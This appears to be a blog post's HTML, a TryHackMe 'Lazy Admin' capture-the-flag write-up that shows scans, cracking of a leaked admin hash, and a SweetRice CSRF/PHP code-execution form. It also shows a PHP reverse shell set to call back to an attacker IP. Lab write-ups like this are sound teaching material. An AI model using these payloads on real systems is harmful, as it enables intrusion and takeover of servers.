<!DOCTYPE html>
<html
  dir="ltr"
  lang="en"
  data-theme=""
  
    class="html theme--light"
  
><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
  <title>
    
      
        THM Lazy Admin |
      Kalifornia909

  </title>

  
  <meta charset="utf-8" /><meta name="generator" content="Hugo 0.123.7"><meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover" />
  <meta name="author" content="Kalifornia909" />
  <meta
    name="description"
    content="Try Hack Me - Lazy Admin"
  />
  
  
    
    
    <link
      rel="stylesheet"
      href="/scss/main.min.1147aa5bacb4bce677a0e264073829caedb82fd18ea07a5f1d80521f539d1c45.css"
      integrity="sha256-EUeqW6y0vOZ3oOJkBzgpyu24L9GOoHpfHYBSH1OdHEU="
      crossorigin="anonymous"
      type="text/css"
    />
  

  
  <link
    rel="stylesheet"
    href="/css/markupHighlight.min.73ccfdf28df555e11009c13c20ced067af3cb021504cba43644c705930428b00.css"
    integrity="sha256-c8z98o31VeEQCcE8IM7QZ688sCFQTLpDZExwWTBCiwA="
    crossorigin="anonymous"
    type="text/css"
  />
  
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/fontawesome.min.7d272de35b410fb165377550cdf9c4d3a80fbbcc961e111914e4d5c0eaf5729f.css"
    integrity="sha256-fSct41tBD7FlN3VQzfnE06gPu8yWHhEZFOTVwOr1cp8="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/solid.min.55d8333481b07a08e07cf6f37319753a2b47e99f4c395394c5747b48b495aa9b.css"
    integrity="sha256-VdgzNIGwegjgfPbzcxl1OitH6Z9MOVOUxXR7SLSVqps="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/regular.min.a7448d02590b43449364b6b5922ed9af5410abb4de4238412a830316dedb850b.css"
    integrity="sha256-p0SNAlkLQ0STZLa1ki7Zr1QQq7TeQjhBKoMDFt7bhQs="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/brands.min.9ed75a5d670c953fe4df935937674b4646f92674367e9e66eb995bb04e821647.css"
    integrity="sha256-ntdaXWcMlT/k35NZN2dLRkb5JnQ2fp5m65lbsE6CFkc="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link rel="shortcut icon" href="/favicons/favicon.ico" type="image/x-icon" />
  <link rel="apple-touch-icon" sizes="180x180" href="/favicons/apple-touch-icon.png" />
  <link rel="icon" type="image/png" sizes="32x32" href="/favicons/favicon-32x32.png" />
  <link rel="icon" type="image/png" sizes="16x16" href="/favicons/favicon-16x16.png" />

  <link rel="canonical" href="http://localhost:1313/post/thm-lazy-admin/" />

  
  
  
  
  <script
    type="text/javascript"
    src="/js/anatole-header.min.f9132794301a01ff16550ed66763482bd848f62243d278f5e550229a158bfd32.js"
    integrity="sha256-&#43;RMnlDAaAf8WVQ7WZ2NIK9hI9iJD0nj15VAimhWL/TI="
    crossorigin="anonymous"
  ></script>

  
    
    
    <script
      type="text/javascript"
      src="/js/anatole-theme-switcher.min.d6d329d93844b162e8bed1e915619625ca91687952177552b9b3e211014a2957.js"
      integrity="sha256-1tMp2ThEsWLovtHpFWGWJcqRaHlSF3VSubPiEQFKKVc="
      crossorigin="anonymous"
    ></script>
  

  


  
  <meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:image" content="http://localhost:1313/images/site-feature-image.png" /><meta name="twitter:title" content="THM Lazy Admin"/>
<meta name="twitter:description" content="Try Hack Me - Lazy Admin"/>



  
  <meta property="og:title" content="THM Lazy Admin" />
<meta property="og:description" content="Try Hack Me - Lazy Admin" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://localhost:1313/post/thm-lazy-admin/" /><meta property="og:image" content="http://localhost:1313/images/site-feature-image.png" /><meta property="article:section" content="post" />
<meta property="article:published_time" content="2021-07-02T09:29:35+09:00" />
<meta property="article:modified_time" content="2021-07-02T09:29:35+09:00" /><meta property="og:site_name" content="Kalifornia&#39;s Tech Wonderland" />




  
  
  
  
  <script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "articleSection": "post",
        "name": "THM Lazy Admin",
        "headline": "THM Lazy Admin",
        "alternativeHeadline": "",
        "description": "
      Try Hack Me - Lazy Admin


    ",
        "inLanguage": "en",
        "isFamilyFriendly": "true",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "http:\/\/localhost:1313\/post\/thm-lazy-admin\/"
        },
        "author" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "creator" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "accountablePerson" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "copyrightHolder" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "copyrightYear" : "2021",
        "dateCreated": "2021-07-02T09:29:35.00Z",
        "datePublished": "2021-07-02T09:29:35.00Z",
        "dateModified": "2021-07-02T09:29:35.00Z",
        "publisher":{
            "@type":"Organization",
            "name": "Kalifornia909",
            "url": "http://localhost:1313/",
            "logo": {
                "@type": "ImageObject",
                "url": "http:\/\/localhost:1313\/favicons\/favicon-32x32.png",
                "width":"32",
                "height":"32"
            }
        },
        "image": 
      [
        
        "http://localhost:1313/images/site-feature-image.png"


      
      ]

    ,
        "url" : "http:\/\/localhost:1313\/post\/thm-lazy-admin\/",
        "wordCount" : "3408",
        "genre" : [ 
      
      "Ethical Hacking"

    
      
        ,

      
      "CTF"

    
      
        ,

      
      "TryHackMe"

    
      
        ,

      
      "Linux"

    
      
        ,

      
      "Pentesting"

    ],
        "keywords" : [ 
      
      "THM"

    
      
        ,

      
      "CTF"

    
      
        ,

      
      "PHP"

    
      
        ,

      
      "Linpeas"

    ]
    }
  </script>


</head>
<body class="body">
    <div class="wrapper">
      <aside
        
          class="wrapper__sidebar"
        
      ><div
  class="sidebar
    animated fadeInDown
  "
>
  <div class="sidebar__content">
    <div class="sidebar__introduction">
      <img
        class="sidebar__introduction-profileimage"
        src="/images/logo.jpg"
        alt="profile picture"
      />
      
        <div class="sidebar__introduction-title">
          <a href="/">Kalifornia&#39;s Tech Wonderland</a>
        </div>
      
      <div class="sidebar__introduction-description">
        <p></p>
      </div>
    </div>
    <ul class="sidebar__list">
      
        <li class="sidebar__list-item">
          <a
            href="https://www.linkedin.com/in/joshua-gaede/"
            target="_blank"
            rel="noopener me"
            aria-label="Linkedin"
            title="Linkedin"
          >
            <i class="fab fa-linkedin fa-2x" aria-hidden="true"></i>
          </a>
        </li>
      
        <li class="sidebar__list-item">
          <a
            href="https://github.com/zer0sense"
            target="_blank"
            rel="noopener me"
            aria-label=""
            title=""
          >
            <i class="fab fa-github fa-2x" aria-hidden="true"></i>
          </a>
        </li>
      
        <li class="sidebar__list-item">
          <a
            href="https://twitter.com/kalifornia909"
            target="_blank"
            rel="noopener me"
            aria-label=""
            title=""
          >
            <i class="fab fa-twitter fa-2x" aria-hidden="true"></i>
          </a>
        </li>
      
    </ul>
  </div><footer class="footer footer__sidebar">
  <ul class="footer__list">
    <li class="footer__item">
      &copy;
      
        2020-2025
      
    </li>
    
  </ul>
</footer>
  
  <script
    type="text/javascript"
    src="/js/medium-zoom.min.1248fa75275e5ef0cbef27e8c1e27dc507c445ae3a2c7d2ed0be0809555dac64.js"
    integrity="sha256-Ekj6dSdeXvDL7yfoweJ9xQfERa46LH0u0L4ICVVdrGQ="
    crossorigin="anonymous"
  ></script></div>
</aside>
      <main
        
          class="wrapper__main"
        
      >
        <header class="header"><div
  class="
    animated fadeInDown
  "
>
  <a role="button" class="navbar-burger" data-target="navMenu" aria-label="menu" aria-expanded="false">
    <span aria-hidden="true" class="navbar-burger__line"></span>
    <span aria-hidden="true" class="navbar-burger__line"></span>
    <span aria-hidden="true" class="navbar-burger__line"></span>
  </a>
  <nav class="nav">
    <ul class="nav__list" id="navMenu">
      
      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/"
              
              title=""
              >Home</a
            >
          </li>
        

      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/about/"
              
              title=""
              >About</a
            >
          </li>
        

      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/tags/"
              
              title=""
              >Tags</a
            >
          </li>
        

      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/categories"
              
              title=""
              >Categories</a
            >
          </li>
        

      
    </ul>
    <ul class="nav__list nav__list--end">
      
      
        <li class="nav__list-item">
          <div class="themeswitch">
            <a title="Switch Theme">
              <i class="fas fa-adjust fa-fw" aria-hidden="true"></i>
            </a>
          </div>
        </li>
      
    </ul>
  </nav>
</div>
</header>
  <div
    class="post 
      animated fadeInDown
    "
  >
    
    <div class="post__content">
      <h1>THM Lazy Admin</h1>
      
        <ul class="post__meta">
          <li class="post__meta-item">
            <em class="fas fa-calendar-day post__meta-icon"></em>
            <span class="post__meta-text"
              >
                
                  2/7/2021
                

              
            </span>
          </li>
          <li class="post__meta-item">
            <em class="fas fa-stopwatch post__meta-icon"></em>
            <span class="post__meta-text">16-minute read</span>
          </li>
        </ul>
      <p>To keep the momentum going I decided to try my hand at another <a href="https://tryhackme.com/room/lazyadmin">TryHackMe Room</a>. I came across lazy admin, and decided to give it a try. Who doesn&rsquo;t love a lazy admin in our field, right?</p>
<h2 id="scans">Scans</h2>
<p>Let&rsquo;s do some initial scans and see what we can find. If you are looking for why I use the scanning technique I do; you can see my previous write up <a href="https://kalifornia909.info/post/thm-pickle-rick/">here</a></p>
<p>After successfully pinging the IP of the box lets kick off a nmap scan. (Do note the IP in this scan is probably different than what you have.)</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sudo nmap -A -T 4 -p- -v -oA nmap/lazyadmin 10.10.111.161
</span></span></code></pre></div><p>Thanks to the power of using the -v flag I can see that port 22 and port 80 are open. Yes, ssh and http are open to explore.</p>
<p>With http being open lets kick off a gobuster scan as well, and hope that it actually finishes in a decent time.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,sh,txt,cgi,html,js,css,py -u 10.10.111.161 | tee gobuster.txt
</span></span></code></pre></div><p>Wait..That&rsquo;s a little different from last time you ran a gobuster scan. what is the <code>| tee gobuster.txt</code>. That will pipe the output of gobuster into a text file. While this is running lets check out the website and see what we can manually find out.</p>
<p>Well things are looking promising. A name like lazy admin and a default Apache 2 page means that we have a chance.</p>
<figure><img src="/images/Posts/009/defaultapache.jpg"/>
</figure>

<p>Lets take a look at what robots.txt gives us. Unfortunately, no loot except for the version and OS disclosure. Lets not forget that gives us information that could be useful when looking up potential exploits later.</p>
<figure><img src="/images/Posts/009/robot.jpg"/>
</figure>

<p>Viewing the page source doesn&rsquo;t give anything obvious at first, but lets not completely rule anything out yet.</p>
<p>Now that we have done some poking and prodding around manually lets see what our scans have given us.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Nmap scan report for 10.10.111.161
</span></span><span class="line"><span class="cl">Host is up (0.27s latency).
</span></span><span class="line"><span class="cl">Not shown: 65533 closed ports
</span></span><span class="line"><span class="cl">PORT   STATE SERVICE VERSION
</span></span><span class="line"><span class="cl">22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
</span></span><span class="line"><span class="cl">| ssh-hostkey:
</span></span><span class="line"><span class="cl">|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
</span></span><span class="line"><span class="cl">|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
</span></span><span class="line"><span class="cl">|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
</span></span><span class="line"><span class="cl">80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
</span></span><span class="line"><span class="cl">| http-methods:
</span></span><span class="line"><span class="cl">|_  Supported Methods: POST OPTIONS GET HEAD
</span></span><span class="line"><span class="cl">|_http-server-header: Apache/2.4.18 (Ubuntu)
</span></span><span class="line"><span class="cl">|_http-title: Apache2 Ubuntu Default Page: It works
</span></span><span class="line"><span class="cl">No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
</span></span><span class="line"><span class="cl">TCP/IP fingerprint:
</span></span><span class="line"><span class="cl">OS:SCAN(V=7.91%E=4%D=7/1%OT=22%CT=1%CU=33084%PV=Y%DS=4%DC=T%G=Y%TM=60DE60DE
</span></span><span class="line"><span class="cl">OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS(O
</span></span><span class="line"><span class="cl">OS:1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST11N
</span></span><span class="line"><span class="cl">OS:W6%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R
</span></span><span class="line"><span class="cl">OS:=Y%DF=Y%T=40%W=6903%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
</span></span><span class="line"><span class="cl">OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
</span></span><span class="line"><span class="cl">OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
</span></span><span class="line"><span class="cl">OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
</span></span><span class="line"><span class="cl">OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
</span></span><span class="line"><span class="cl">OS:)
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Uptime guess: 48.037 days (since Fri May 14 16:48:59 2021)
</span></span><span class="line"><span class="cl">Network Distance: 4 hops
</span></span><span class="line"><span class="cl">TCP Sequence Prediction: Difficulty=255 (Good luck!)
</span></span><span class="line"><span class="cl">IP ID Sequence Generation: All zeros
</span></span><span class="line"><span class="cl">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">TRACEROUTE (using port 80/tcp)
</span></span><span class="line"><span class="cl">HOP RTT       ADDRESS
</span></span><span class="line"><span class="cl">1   133.28 ms 10.2.0.1
</span></span><span class="line"><span class="cl">2   ... 3
</span></span><span class="line"><span class="cl">4   276.08 ms 10.10.111.161
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Read data files from: /usr/bin/../share/nmap
</span></span><span class="line"><span class="cl">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span class="line"><span class="cl"># Nmap done at Thu Jul  1 17:42:06 2021 -- 1 IP address (1 host up) scanned in 354.76 seconds
</span></span></code></pre></div><p>I am so glad that gobuster gives output while it still scans. I glanced at my scan and saw that it pulled up <code>/index.html</code> and <code>/content</code>. The index doesn&rsquo;t excite me much because we already saw that but lets look at the content directory. We come to see that it is running something called SweetRice as a website management system.</p>
<figure><img src="/images/Posts/009/sweetrice.jpg"/>
</figure>

<p>Alright, well never heard of that before. Lets go to the googles and do the super hacker thing of searching for SweetRice exploit. Looks like exploit-db has definitely heard of SweetRice. I&rsquo;m glad someone has.</p>
<p>I see that there is an <a href="https://www.exploit-db.com/exploits/40716">Arbitrary File Upload</a> and think that looks juicy. Its a python script, but after looking at it, it needs a username/password. Well we haven&rsquo;t got any of that yet, so lets look at the other results.</p>
<p>There is a <a href="https://www.exploit-db.com/exploits/40718">Backup Disclosure</a> but looking at text it was tested on Windows 10. Well, this machine let us know it was Ubuntu.</p>
<p>I fired up Burpsuite to see if intercepting the traffic, but it gave me nothing.</p>
<p>Lets try metaploit. Why not this isn&rsquo;t the OSCP.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</span> <span class="o">---------------------------------</span>
</span></span><span class="line"><span class="cl"> <span class="n">Exploit</span> <span class="n">Title</span>                                                                                                                                                                                                              <span class="o">|</span>  <span class="ne">Path</span>
</span></span><span class="line"><span class="cl"><span class="o">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</span> <span class="o">---------------------------------</span>
</span></span><span class="line"><span class="cl"><span class="n">SweetRice</span> <span class="mf">0.5</span><span class="o">.</span><span class="mi">3</span> <span class="o">-</span> <span class="n">Remote</span> <span class="ne">File</span> <span class="n">Inclusion</span>                                                                                                                                                                                     <span class="o">|</span> <span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">10246.</span><span class="n">txt</span>
</span></span><span class="line"><span class="cl"><span class="n">SweetRice</span> <span class="mf">0.6</span><span class="o">.</span><span class="mi">7</span> <span class="o">-</span> <span class="n">Multiple</span> <span class="n">Vulnerabilities</span>                                                                                                                                                                                  <span class="o">|</span> <span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">15413.</span><span class="n">txt</span>
</span></span><span class="line"><span class="cl"><span class="n">SweetRice</span> <span class="mf">1.5</span><span class="o">.</span><span class="mi">1</span> <span class="o">-</span> <span class="n">Arbitrary</span> <span class="ne">File</span> <span class="n">Download</span>                                                                                                                                                                                   <span class="o">|</span> <span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">40698.</span><span class="n">py</span>
</span></span><span class="line"><span class="cl"><span class="n">SweetRice</span> <span class="mf">1.5</span><span class="o">.</span><span class="mi">1</span> <span class="o">-</span> <span class="n">Arbitrary</span> <span class="ne">File</span> <span class="n">Upload</span>                                                                                                                                                                                     <span class="o">|</span> <span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">40716.</span><span class="n">py</span>
</span></span><span class="line"><span class="cl"><span class="n">SweetRice</span> <span class="mf">1.5</span><span class="o">.</span><span class="mi">1</span> <span class="o">-</span> <span class="n">Backup</span> <span class="n">Disclosure</span>                                                                                                                                                                                         <span class="o">|</span> <span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">40718.</span><span class="n">txt</span>
</span></span><span class="line"><span class="cl"><span class="n">SweetRice</span> <span class="mf">1.5</span><span class="o">.</span><span class="mi">1</span> <span class="o">-</span> <span class="n">Cross</span><span class="o">-</span><span class="n">Site</span> <span class="n">Request</span> <span class="n">Forgery</span>                                                                                                                                                                                <span class="o">|</span> <span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">40692.</span><span class="n">html</span>
</span></span><span class="line"><span class="cl"><span class="n">SweetRice</span> <span class="mf">1.5</span><span class="o">.</span><span class="mi">1</span> <span class="o">-</span> <span class="n">Cross</span><span class="o">-</span><span class="n">Site</span> <span class="n">Request</span> <span class="n">Forgery</span> <span class="o">/</span> <span class="n">PHP</span> <span class="n">Code</span> <span class="n">Execution</span>                                                                                                                                                           <span class="o">|</span> <span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">40700.</span><span class="n">html</span>
</span></span><span class="line"><span class="cl"><span class="n">SweetRice</span> <span class="o">&lt;</span> <span class="mf">0.6</span><span class="o">.</span><span class="mi">4</span> <span class="o">-</span> <span class="s1">&#39;FCKeditor&#39;</span> <span class="n">Arbitrary</span> <span class="ne">File</span> <span class="n">Upload</span>                                                                                                                                                                       <span class="o">|</span> <span class="n">php</span><span class="o">/</span><span class="n">webapps</span><span class="o">/</span><span class="mf">14184.</span><span class="n">txt</span>
</span></span><span class="line"><span class="cl"><span class="o">----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------</span> <span class="o">---------------------------------</span>
</span></span><span class="line"><span class="cl"><span class="n">Shellcodes</span><span class="p">:</span> <span class="n">No</span> <span class="n">Results</span>
</span></span></code></pre></div><p>Alright. Well I have no idea what version of SweetRice through any of my scans, so lets just see what we could find that would give us something nice and juicy that we can throw at a wall and see if it sticks. Something that stood out was the <code>SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution</code>. If I can get PHP to execute that means I can possibly get a reverse shell and say in my best hacker voice &ldquo;IM IN&rdquo;.</p>
<p>Well lets just say the hacker voice is still on ice. That did not do anything for me.</p>
<p>At this point I envision myself as a child learning how to ride a bike, and lacking the skills of braking and control am heading right towards a brick wall. The great thing about TryHackMe is that it is an educational site fires, so lets learn some things. I fired up John Hammond&rsquo;s video that&rsquo;s in the video section of this room to see where I went wrong.</p>
<p>This is where I found the errors of my ways. The Backup Disclosure we found earlier was the key. However, i didn&rsquo;t add the <code>/content</code> directory for this to work. In the end the backup disclosure was found in <code>http://10.10.111.161/content/inc/mysql_backup/</code>.</p>
<p>Great! Pause the video and see how far we can get now. Lets get that backup file and see what we can do with it.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">http://10.10.111.161/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql
</span></span></code></pre></div><p>A .sql file what can we open that with. Well, I am a fan of sublime text so lets give that a shot. Looking at the beginning of the document it looks like a php file. A lengthy php file but none the less a php file.</p>
<p>The php file has a line that will make you scroll forever right. In that line it gives some good information though. You can see the string of <code>manager</code> which could give us the username, and there is something resembling a hash after password <code>42f749ade7f9e195bf475f37a44cafcb</code>. Lets try to use <a href="https://crackstation.net/">crackstation</a> to see if we can crack it. Well that gives us a result, and it looks like an md5 hash.</p>
<p>We have an username and password. What can we do with it because there hasn&rsquo;t been a place for us to try to log in. The vision of the brick wall approaching while riding a bike is coming to mind again. Let&rsquo;s play the video again and learn some more things.</p>
<h2 id="exploitation">Exploitation</h2>
<p>At first I thought the arbitrary code execution was a bust, but looking at the video again that will give us the login page we are looking for. Lets follow John Hammonds walk through on how to make this work for us. First lets copy the exploit so we can edit it to make it work for us.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">searchsploit -m php/webapps/40700.html
</span></span></code></pre></div><p>That puts it in the directory you are working with. Now we are are going to have to change the html file. The first thing you need to change is the localhost to the IP of the machine and add the /content directory. Another change John made in his video is to change the html encoding in textarea. At the end of the editing it should resemble something like this.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">html</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">body</span> <span class="n">onload</span><span class="o">=</span><span class="s2">&#34;document.exploit.submit();&#34;</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">form</span> <span class="n">action</span><span class="o">=</span><span class="s2">&#34;http://10.10.111.161/content/as/?type=ad&amp;mode=save&#34;</span> <span class="n">method</span><span class="o">=</span><span class="s2">&#34;POST&#34;</span> <span class="n">name</span><span class="o">=</span><span class="s2">&#34;exploit&#34;</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">input</span> <span class="n">type</span><span class="o">=</span><span class="s2">&#34;hidden&#34;</span> <span class="n">name</span><span class="o">=</span><span class="s2">&#34;adk&#34;</span> <span class="n">value</span><span class="o">=</span><span class="s2">&#34;hacked&#34;</span><span class="o">/&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="n">textarea</span> <span class="n">type</span><span class="o">=</span><span class="s2">&#34;hidden&#34;</span> <span class="n">name</span><span class="o">=</span><span class="s2">&#34;adv&#34;</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="err">?</span><span class="n">php</span>
</span></span><span class="line"><span class="cl"><span class="n">echo</span> <span class="s1">&#39;&lt;h1&gt; Hacked &lt;/h1&gt;&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="n">phpinfo</span><span class="p">();</span><span class="err">?</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">&lt;/</span><span class="n">textarea</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;/</span><span class="n">form</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;/</span><span class="n">body</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;/</span><span class="n">html</span><span class="o">&gt;</span>
</span></span></code></pre></div><p>Don&rsquo;t forget that your IP will probably be different. The html file is complete, so lets run it.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">firefox 40700.html
</span></span></code></pre></div><p>I didn&rsquo;t change the name of when I copied it into my local directory, so whatever your HTML file is name use that. This will bring you a login page. That&rsquo;s great because we already have a username and password.
<figure><img src="/images/Posts/009/login.jpg"/>
</figure>
</p>
<p>Enter your username and password to login to the website management. One thing I had to follow along the video with is to run the exploit again after logging in to the website management page.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">firefox 40700.html
</span></span></code></pre></div><p>Commented out in the bottom of the exploit we pulled down from searchsploit will give you an address to see if this was successful by giving you a php info page.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">http://10.10.111.161/content/inc/ads/hacked.php
</span></span></code></pre></div><p>As long as this page generates you know you are on the right path.</p>
<p>Now that we have file execution let&rsquo;s give a php reverse shell a try. You can do this multiple ways. If you want to use a website to generate it for you, you can use <a href="https://www.revshells.com/">revshells.com</a>. If you are running kali you can copy the php-reverse shell into your directory and make the edits for this box.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">cp /usr/share/webshells/php/php-reverse-shell.php .
</span></span></code></pre></div><p>I copied the reverse shell that came with Kali to give that a shot.</p>
<p>You will need you the IP address for the machine that you are using to attack this site, so in a terminal you are going to run <code>ip a</code>. The output you are looking for is usually tun0 (tunnel 0 since since you are using a vpn to connect). If your setup is different then look for the IP address starting with 10.</p>
<p>The php reverse shell file has great documentation commented out to give you more information about the file itself. What you are looking for is the lines that have <code>// CHANGE THIS</code> commented out afterwords. It is asking for your IP and port. Something similar to this.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">set_time_limit (0);
</span></span><span class="line"><span class="cl">$VERSION = &#34;1.0&#34;;
</span></span><span class="line"><span class="cl">$ip = &#39;10.2.40.5&#39;;  // CHANGE THIS
</span></span><span class="line"><span class="cl">$port = 9001;       // CHANGE THIS
</span></span><span class="line"><span class="cl">$chunk_size = 1400;
</span></span><span class="line"><span class="cl">$write_a = null;
</span></span><span class="line"><span class="cl">$error_a = null;
</span></span><span class="line"><span class="cl">$shell = &#39;uname -a; w; id; /bin/sh -i&#39;;
</span></span><span class="line"><span class="cl">$daemon = 0;
</span></span><span class="line"><span class="cl">$debug = 0;
</span></span></code></pre></div><p>Following along with John you are going to copy your PHP reverse shell to the previous html file that gave you the php info page. I copied the file to a new html file</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">cp 40700.html exploit.html
</span></span></code></pre></div><p>That leaves my proof of concept file in tact and now I can play with adding the php reverse shell.</p>
<p>How do you add your reverse shell to your proof of concept html file. I&rsquo;m glad you asked. You will need to edit php youre executing, so look for the <code>&lt;?php echo '&lt;h1&gt; Hacked &lt;/h1&gt;'; phpinfo();?&gt;</code>. That is what gave us our php info earlier. Now replace it with the entire text of your php reverse shell. I noticed John also changed the line of <code>&lt;input type=&quot;hidden&quot; name=&quot;adk&quot; value=&quot;hacked&quot;/&gt;</code> to something different of <code>&lt;input type=&quot;hidden&quot; name=&quot;adk&quot; value=&quot;revshell&quot;/&gt;</code>. After the edits this is what my html file looked like.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">&lt;!--</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Exploit Title: SweetRice 1.5.1 Arbitrary Code Execution</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Date: 30-11-2016</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Exploit Author: Ashiyane Digital Security Team</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Vendor Homepage: http://www.basic-cms.org/</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip</span>
</span></span><span class="line"><span class="cl"><span class="c1"># Version: 1.5.1</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># Description :</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add</span>
